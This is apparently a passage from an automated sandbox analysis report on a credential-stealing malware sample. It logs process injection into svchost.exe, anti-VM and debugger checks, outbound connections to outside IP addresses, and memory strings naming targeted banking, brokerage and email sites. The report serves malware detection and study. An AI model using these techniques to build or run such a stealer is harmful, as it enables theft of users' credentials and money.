              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599063Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598938Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598828Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598696Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598587Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598391Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598250Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598140Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598031Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597922Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597812Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597703Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597594Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597483Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597375Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597265Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597047Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596938Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596827Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596718Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596609Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596500Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596391Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596266Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596156Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596047Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595937Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595817Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595599Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595331Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595203Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595093Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594984Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594765Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594656Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594547Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594438Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594313Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594188Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594063Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 593938Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 593828Jump to behavior
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: wscript.exe, 00000009.00000002.1426570215.0000019F6CCA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: FACT0987789000900.exe, 00000003.00000003.1277930574.000000000145E000.00000004.00000020.00020000.00000000.sdmp, FACT0987789000900.exe, 00000003.00000002.1300545312.000000000145E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QeMu6j
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
              Source: juvenile.exe, 00000006.00000002.1321786442.0000000001611000.00000004.00000020.00020000.00000000.sdmp, juvenile.exe, 00000006.00000003.1299065276.000000000155B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QeMu6
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: juvenile.exe, 0000000A.00000003.1426648043.000000000137D000.00000004.00000020.00020000.00000000.sdmp, juvenile.exe, 0000000A.00000002.1448248183.000000000137D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QeMu6;
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: svchost.exe, 0000000B.00000002.2546214590.000000000366B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltes>
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: svchost.exe, 00000008.00000002.2545842926.000000000326B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: wscript.exe, 00000009.00000002.1426570215.0000019F6CCA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\O
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: svchost.exe, 0000000B.00000002.2550365805.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: C:\Users\user\Desktop\FACT0987789000900.exeAPI call chain: ExitProcess graph end nodegraph_3-93460
              Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_09239578 LdrInitializeThunk,8_2_09239578
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004E6AAF BlockInput,3_2_004E6AAF
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_00493D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,3_2_00493D19
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004C3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,3_2_004C3920
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_004019F0
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004AE01E LoadLibraryA,GetProcAddress,3_2_004AE01E
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_0134A060 mov eax, dword ptr fs:[00000030h]3_2_0134A060
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_0134A0C0 mov eax, dword ptr fs:[00000030h]3_2_0134A0C0
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_01348A10 mov eax, dword ptr fs:[00000030h]3_2_01348A10
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_01568640 mov eax, dword ptr fs:[00000030h]6_2_01568640
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_01569CF0 mov eax, dword ptr fs:[00000030h]6_2_01569CF0
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_01569C90 mov eax, dword ptr fs:[00000030h]6_2_01569C90
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 10_2_01264128 mov eax, dword ptr fs:[00000030h]10_2_01264128
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 10_2_01265778 mov eax, dword ptr fs:[00000030h]10_2_01265778
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 10_2_012657D8 mov eax, dword ptr fs:[00000030h]10_2_012657D8
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004CA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,3_2_004CA66C
              Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004B8189 SetUnhandledExceptionFilter,3_2_004B8189
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004B81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_004B81AC
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008F8189 SetUnhandledExceptionFilter,6_2_008F8189
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008F81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_008F81AC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0040CE09
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0040E61C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00416F6A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004123F1 SetUnhandledExceptionFilter,8_2_004123F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040CE09
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040E61C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00416F6A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_004123F1 SetUnhandledExceptionFilter,11_2_004123F1
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.96.3 443Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 132.226.247.73 80Jump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EE8008Jump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 30D4008Jump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004CB106 LogonUserW,3_2_004CB106
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_00493D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,3_2_00493D19
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004D411C SendInput,keybd_event,3_2_004D411C
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004D74E7 mouse_event,3_2_004D74E7
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\FACT0987789000900.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\thixolabile\juvenile.exe "C:\Users\user\AppData\Local\thixolabile\juvenile.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\thixolabile\juvenile.exe" Jump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004CA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,3_2_004CA66C
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004D71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,3_2_004D71FA
              Source: FACT0987789000900.exe, juvenile.exeBinary or memory string: Shell_TrayWnd
              Source: FACT0987789000900.exe, 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmp, juvenile.exe, 00000006.00000002.1320568116.000000000097E000.00000040.00000001.01000000.00000005.sdmp, juvenile.exe, 0000000A.00000002.1447557851.000000000097E000.00000040.00000001.01000000.00000005.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004B65C4 cpuid 3_2_004B65C4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,8_2_00417A20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,11_2_00417A20
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004E091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,3_2_004E091D
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_0050B340 GetUserNameW,3_2_0050B340
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004C1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,3_2_004C1E8E
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004ADDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_004ADDC0
              Source: C:\Users\user\Desktop\FACT0987789000900.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
